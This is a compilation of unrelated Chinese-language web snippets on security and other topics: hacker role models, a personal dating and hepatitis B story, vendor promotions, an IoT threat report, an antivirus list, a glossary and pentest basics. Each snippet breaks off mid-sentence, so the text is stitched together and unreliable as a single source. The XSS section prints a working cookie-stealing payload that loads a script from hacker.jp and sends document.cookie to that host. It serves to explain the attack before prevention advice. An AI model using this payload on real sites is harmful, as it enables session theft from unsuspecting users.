网络安全

寻找黑客偶像 外国黑客 丹尼斯·利奇，C语言之父，UNIX之父。生于1941年9月9日，哈佛大学数学博士。丹尼斯·利奇先生的专业精神令人感动，近40年如一日，在他所从事的领域辛勤耕耘，而他的多项发明，包括C语言，Unix，也包括现在正在进行的Plan9，无论哪一项，在软件发展史上都有着举足轻重的地位，和他的伟大成就形成对照的是他的行事，态度低调，他的表达，象他的软件一样，简洁生动而准确。 中国黑客 林正隆，中国台湾著名黑客，中国黑客领军人物。2011年获得COG信息安全终身成就奖。他是中国黑客第一人，是中国黑客的启蒙人，拥有强大的技术，但他自己总结了黑客守则，从不做违法之事，他写了八篇黑客入门资料，告诉人们这不仅是教育资料，更是让人们能对自己的系统做出安全的保护。 学习的优点 他们虽然掌握这强大的技术，指尖间就能攻破各种系统，获取大量的利益，但他们没有这样做，而是把自己的技术用来造福人们，来推进世界计算机科学的进步，同时他们兢兢业业，默默无闻的做着改变世界的贡献，他们是值得我们学习的。 应该学习的工具 Scapy是一个强大的交互式数据包操作工具、数据包生成器、网络扫描器、网络发现工具和数据包嗅探器，它可以与python进行交互，首先我要先学会python，在之后的学习中，希望可以在社团等的帮助下尽快掌握python、c语言等。 四年计划 不管是通过自学还是听课，学会python

相亲脱单记 话说之前被父母迫切去相亲，前两次都失败告终，其实那时我一是确实没放在心上，每次都是应付了事；二是我有一个致命的心病，我在刚工作一年时体检发现有乙肝。 回到我刚开始工作的第二年，公司是包一日三顿伙食，当时没有996的概念，反正干累了就回去睡觉。 因为公司有一半的是客服人员，是24小时在线，两班倒。我们中午和晚饭都是在外面一个苍蝇馆子吃饭，吃完记个帐就行。 公司组织体检发现我有乙肝后，公司就让我一个人吃饭了，每天给我带饭回来。再后来公司老板觉得，长期在外面吃饭不安全，请了一个阿姨来做饭。 从那时起，我就开始服用“拉米夫定”治疗乙肝，一天一粒，一个月要花掉500+，三个月检查一次，总共用了 8 年时间，中途还产生过耐药性换过药，才将大三阳转为小三阳，将乙肝控制下来，这些年下来少说花了60000+元。 后面一次相亲，记得还是中秋节，我穿的西装笔挺的很不自在，不过有双方家长还有亲友们在，还是希望给大家留点好的印象。 第二天周未，我还是硬着头皮，礼节性的约上女方（也就是我现在的老婆）出去玩，可我真不知道有什么好玩的。不过我老婆真的不错，带我去城里看招聘的，有没有合适我的工作机会...，说真的被感动了，除了父母还第一次有人这么关心我和我的工作。不过整个大半天下来，过程还是非常尴尬，不知道聊些什么好。 我有乙肝的事，心中总是忐忑不安，在我们看完电影《山楂树之恋》后，我发短信告诉了她

天气越来越凉爽,在对客户网站代码进行渗透测试,漏洞测试的同时我们SINE安全渗透技术要对客户的网站源代码进行全方位的安全检测与审计,只有真正的了解网站,才能更好的去渗透测试,发现网站存在的漏洞,尽可能的让客户的网站在上线之前,安全防护做到最极致.在后期的网站,平台快速发展过程中,避免重大的漏洞导致的经济损失. 首先分享一下我们SINE安全前段时间对客户的金融平台的渗透测试过程,在审计代码的时候发现了问题,首先看到的是客户网站采用的php语言+mysql数据库,前端还使用了VUE JS框架,在进行渗透测试前,我们要检查客户网站的源代码是否加密以及混淆,再一个查看php文件是否对应的URL地址,是调用的,还是单独的PHP功能页面,还有入口文件和index.php首页访问页面的代码是否一致化.接着要了解的是整个金融平台网站的目录,都包含哪些功能目录,这次我们检查到的,客户网站有会员注册功能,头像上传功能,银行卡添加,充值,提现,投资记录,意见与反馈,个人资料修改等等功能. 我们SINE安全在进行网站代码的安全审计,采用的审计方法是敏感函数以及传输值的追踪与调试的办法去查看代码是否含有恶意代码以及存在的漏洞隐患,是否可导致产生网站漏洞,包括一些逻辑漏洞,垂直,平行越权漏洞的产生. 在大体的代码审计一遍后发现有些PHP文件存在SQL注入漏洞,没有开关闭合引号,导致可以前端传入恶意的参数值

2018年，是 IoT 高速发展的一年，从空调到电灯，从打印机到智能电视，从路由器到监控摄像头统统都开始上网。随着5G网络的发展，我们身边的 IoT 设备会越来越多。与此同时，IoT 的安全问题也慢慢显露出来。 腾讯安全云鼎实验室对 IoT 安全进行了长期关注，本文通过云鼎实验室听风威胁感知平台收集的 IoT 安全情报进行分析，从IoT 的发展现状、IoT 攻击的常见设备、IoT 攻击的主要地区和 IoT 恶意软件的传播方式等方面进行介绍。 一、IoT的发展现状 图片来自网络 近几年 IoT 设备数量飞速增长， 2018年一共有70亿台 IoT 设备，每年保持20%左右的速度增长，到2020年预计 IoT 设备可达99亿台。 图 全球 IoT 设备增长趋势 数据来源： State of the IoT 2018: Number of IoT devices now at 7B – Market accelerating 随着 IoT 设备的普及，IoT 安全问题越来越多。根据卡巴斯基 IoT 安全报告 New trends in the world of IoT threats ，近年来捕获到的 IoT 恶意样本数量呈现爆炸式的增长，从侧面反映了 IoT 安全问题越来越严峻。 图 IoT 恶意样本数量 数据来源：卡巴斯基 New trends in the world of IoT

近期国内外的各大安全厂商纷纷推出2013新版杀毒软件，包括完全免费的终身免费版，在防网络钓鱼方面有很大进步。下面的八款杀毒软件都是永久免费，而且全面兼容Windows主流平台。 1. 瑞星杀毒软件V16 瑞星杀毒软件2013 软件大小: 36.20MB 软件语言: 简体中文 国产杀毒软件的龙头老大瑞星， 瑞星杀毒软件免费下载 官网 依然坚持发展独立自主的病毒查杀引擎。瑞星的智能虚拟化引擎，显著提高对木马、后门、蠕虫等的查杀率，并明显提升杀毒速度。“智能云安全”技术针对网上大量出现的恶意病毒、挂马网站和钓鱼网站等，可实现自动收集、分析、处理，完美阻截木马攻击、黑客入侵及网络诈骗，为用户上网提供智能化的整体上网安全解决方案。 最新版本基于全新的理念开发，融合网化安全服务新变革，追求视觉效果的极致和最小的资源占用，提供最佳的用户体验。新版杀毒软件提供系统内核加固、木马防御、U盘防护、浏览器防护和办公软件防护等，提供文件和邮件的实时监控，并集合了一系列的实用安全工具。 官方最新版下载： 瑞星杀毒软件2013(瑞星2013) V16 中文官方安装版 官方直接下载地址(rising官方最新瑞星杀毒极速下载器) 2. 金山新毒霸（悟空）金山毒霸2013 老牌杀毒厂商金山一直受国人推崇。金山毒霸是一款云安全智扫反病毒软件，融合启发式搜索、代码分析、虚拟机查毒等成熟可靠的反病毒技术

一、什么是XSS攻击 　　跨站脚本攻击（Cross-Site Scripting，XSS）是指通过存在安全漏洞的Web 网站注册用户的浏览器内运行非法的 HTML 标签或 JavaScript 进行的一种攻击。动态创建的 HTML 部分有可能隐藏着安全漏洞。 　　跨站脚本攻击可能造成以下影响：利用虚假输入表单骗取用户个人信息；利用脚本获取用户cookie，然后在用户不知情的情况下做出危害用户个人利益的行为。 例如：如下行为就可以窃取客户的cookie #黑客脚本文件 <script src=http://hacker.jp/xss.js></script> #黑客脚本文件内容，获取用户的cookie并发送至黑客网址 var content = escape(document.cookie);document.write("<img src=http://hacker.jp/?"); document.write(content); document.write(">"); 在web应用上执行黑客脚本文件就可以窃取到客户的cookie，并且当送到指定的黑客网址。 二、预防XSS攻击 XSS攻击存在的根本原因是对用户提交给Web Server端的内容没有进行充分的过滤，如果服务端对用户提交的一些不合法的参数和内容进行过滤，也就不易出现XSS攻击了。 预防XSS攻击思路

8 月 20 日，中国互联网络信息中心（CNNIC）发布报告显示，我国网民突破 8 亿，其中超过 98% 的人每天用手机上网。实际上在我们享受互联网带来便利的同时，每个人的隐私也在不断被泄露与买卖中。 数据隐私泄露的现状如何？国内外相关的立法进程如何？数据隐私泄露的问题到底有没有办法解决？本文 由 ARPA 联合创始人兼 CEO 徐茂桐撰写，ARPA 是一家致力于为企业提供数据安全隐私的计算解决方案的区块链公司。 数据隐私的发展现状 随着互联网的高速发展，我们在享受丰富的互联网产品和服务的同时，也在时时刻刻向提供商提供关于我们自己的全方位个人信息。 广义上来说，所有由我们本人发起的网络使用行为，都可以看做是我们的个人信息。而我们在网上所体现出的所有个人信息，包括我们的浏览习惯、地理位置、设备 IP、使用的浏览设备和浏览器的型号都在不断被收集、存储和处理。 数以亿计的用户撑起了全球互联网科技企业超过 9 万亿美元的市值，而当互联网发展愈发呈现寡头化趋势之后， 个人数据更趋于集中，一旦泄露造成的后果也越来越严重。 根据，中国互联网协会在 2016 年发布的《中国网民权益保护调查报告》显示，2016 年国内有 6.88 亿网民曾遭受过不同程度的个人信息泄露，造成的经济损失估算达 915 亿元。 数据隐私泄露事件层出不穷： 今年 1 月，掌握着印度 10 亿公民的身份数据库 Aadhaar

1、黑帽 　　为非法目的进行黑客攻击的人，通常是为了经济利益。他们进入安全网络以销毁，赎回，修改或窃取数据，或使网络无法用于授权用户。这个名字来源于这样一个事实：老式的黑白西部电影中的恶棍很容易被电影观众识别，因为他们穿着黑色的斯泰森，而“好人”则戴着白帽子。 2、后门 　　隐藏在计算机系统中的“管道”，绕过登录和密码的正统保护，从而使它们在保护数据方面基本上无效。 3、蛮力攻击 　　黑客对系统中的每一个可能的密码进行高度密集的自动搜索，从而破坏安全并获得对计算机的访问权限。 4、Doxing 　　通过在线查看其详细信息，发现并发布互联网用户的身份。黑客专业术语大全 5、灰色的帽子 　　执行黑客攻击的人，但不是为了个人或经济利益。一个例子是黑客行为，作为更广泛的政治抗议活动的一部分进行，活动家们使一个组织的政策或官方观点被视为诅咒而令人尴尬或羞辱。 6、IP 　　Internet协议地址-计算机的标识符或“指纹”。这用于识别使用设备的人，跟踪其活动或显示其位置。 7、按键记录 　　跟踪计算机用户按下哪些键，以便黑客可以将登录代码和密码记录到系统中。 8、恶意软件 　　旨在控制或窃取计算机数据的程序。 9、网络钓鱼 　　通过向他们发送看似来自真正的人或组织的电子邮件，重复某人向您提供他们的个人信息，例如密码，银行帐户详细信息(例如PIN号码)和信用卡详细信息。 10、欺骗 　

很多人在使用邮件过程中习焉不察，把邮件写好点“发送”刷的一下瞬间即达对方收件箱，殊不知，邮件的传送有时是很不容易的一件事，正因为大多数商业资讯甚至机密文件都通过邮件传输，所以被恶意软件、网络钓鱼攻击和垃圾邮件、病毒侵扰的情况很常见。稍有不慎中了圈套还浑然不觉。别看你的邮箱使用起来很安全，那是因为有邮件网关在默默的为你遮风挡雨了。很多朋友听到这里，大感惊讶：啥子叫邮件网关？ 邮件网关是用于监控企业的入站电子邮件中恶意邮件或不需要的垃圾邮件，它的核心功能是阻止或隔离恶意软件、网络钓鱼攻击和垃圾邮件。此外，一些产品还提供针对出站电子邮件的数据丢失防护（DLP）和加密功能。 那么怎么样选择一款好的邮件安全网关呢？或者说一款优质的邮件网关有什么标准？ U-Mail专家认为，我们可以从几个要素去评估： 首先当然是基本的安全防护功能啦。 包括对恶意软件、垃圾邮件和网络钓鱼攻击构筑的密不透风的防护墙，事实上目前市面上大部分邮件网关都能满足此类需求。像U-Mail邮件安全网关的多重反病毒引擎过滤（32级压缩包解压过滤），能够有效阻截病毒入侵和垃圾邮件骚扰，隔离所有可疑内容，全面保护邮件安全。此外，U-Mail邮件网关还采用沙箱等先进技术来评估文件的潜在恶意行为，检测出恶意软件；并且主动收集威胁情报（如发起攻击的主机IP地址或恶意域名的URL等），实时更新数据库状态，将可能的危险扼杀在萌芽状态。

渗透测试 1.简介 渗透测试，是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设，你的公司定期更新安全策略和程序，时时给系统打补丁，并采用了[漏洞扫描器](https://baike.baidu.com/item/漏洞扫描器/11024468)等工具，以确保所有补丁都已打上。如果你早已做到了这些，为什么还要请外方进行审查或渗透测试呢？因为，渗透测试能够独立地检查你的网络策略，换句话说，就是给你的系统安了一双眼睛。而且，进行这类测试的，都是寻找网络系统安全漏洞的专业人士。 ​ 渗透测试 (penetration test)并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意 黑客 的攻击方法，来评估 计算机网络系统 安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。 ​ 换句话来说，渗透测试是指渗透人员在不同的位置（比如从内网、从外网等位置）利用各种手段对某个特定网络进行测试，以期发现和挖掘系统中存在的漏洞，然后输出渗透测试报告，并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告，可以清晰知晓系统中存在的安全隐患和问题。 我们认为渗透测试还具有的两个显著特点是：渗透测试是一个渐进的并且逐步深入的过程